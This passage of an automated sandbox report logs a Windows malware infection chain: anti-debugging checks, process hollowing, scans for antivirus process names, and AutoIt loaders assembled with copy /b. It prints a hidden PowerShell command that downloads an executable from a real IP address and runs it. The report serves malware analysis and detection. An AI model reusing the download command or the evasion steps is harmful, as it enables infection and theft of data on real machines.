Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Code function: 3_2_04E00585 Start: 04E007FB End: 04E00598 3_2_04E00585
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Code function: 3_2_04E00342 rdtsc 3_2_04E00342
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099F4FF BlockInput, 28_2_0099F4FF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 28_2_0092338B
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 11_2_00406328
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009C652B mov eax, dword ptr fs:[00000030h] 10_2_009C652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009CA302 mov eax, dword ptr fs:[00000030h] 10_2_009CA302
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00945058 mov eax, dword ptr fs:[00000030h] 28_2_00945058
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02C1E4CD mov edi, dword ptr fs:[00000030h] 31_2_02C1E4CD
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02C1E64A mov edi, dword ptr fs:[00000030h] 31_2_02C1E64A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 28_2_009820AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00952992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00952992
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00940BAF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940D45 SetUnhandledExceptionFilter, 28_2_00940D45
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00940F91
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi32_5616.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: mshta.exe PID: 6748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 1548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02C1E4CD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 31_2_02C1E4CD
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Memory written: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 28_2_00981B4D
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0092338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 28_2_0092338B
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098BBED SendInput,keybd_event, 28_2_0098BBED
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098EC9E mouse_event, 28_2_0098EC9E
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE "C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE" Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe "C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe "C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe "C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe "C:\Users\user\AppData\Local\Temp\1053476001\stail.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 952
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 28_2_009814AE
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 28_2_00981FB0
Source: skotes.exe, skotes.exe, 0000000A.00000002.3557951700.0000000000B80000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: BProgram Manager
Source: Macromedia.com, 00000017.00000003.2806842457.0000000004463000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000017.00000000.2800821872.00000000006D3000.00000002.00000001.01000000.00000010.sdmp, AchillesGuard.com, 0000001C.00000002.3528429627.00000000009E3000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: AchillesGuard.com Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009AD3E2 cpuid 10_2_009AD3E2
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053663021\am_no.cmd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053663021\am_no.cmd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\fox.zip.enc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0097E5F4 GetLocalTime, 28_2_0097E5F4
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0097E652 GetUserNameW, 28_2_0097E652
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 28_2_0095BCD2
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 11_2_00406831
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR

Stealing of Sensitive Information

barindex
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 5.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2225887801.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2266194444.0000000000991000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2273381494.0000000000991000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239022204.0000000000B51000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2198141136.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2677861995.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3554162033.0000000000991000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2232623830.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.ugdKEDU.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.2957620541.0000000000892000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe, type: DROPPED
